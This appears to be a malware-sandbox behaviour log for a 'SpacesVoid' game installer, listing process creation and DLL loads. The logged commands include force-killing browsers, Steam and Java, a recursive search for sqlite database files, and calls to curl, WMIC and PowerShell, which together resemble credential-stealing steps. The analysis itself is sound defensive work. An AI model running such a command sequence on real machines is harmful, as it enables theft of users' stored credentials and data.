Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1680 --field-trial-handle=1496,i,17456217344094680572,15574627026169771405,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1884 --field-trial-handle=1456,i,1191886184323445793,12446102649480836012,262144 --disable-features=PaintHolding /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . *.sqlite
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: kbdus.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
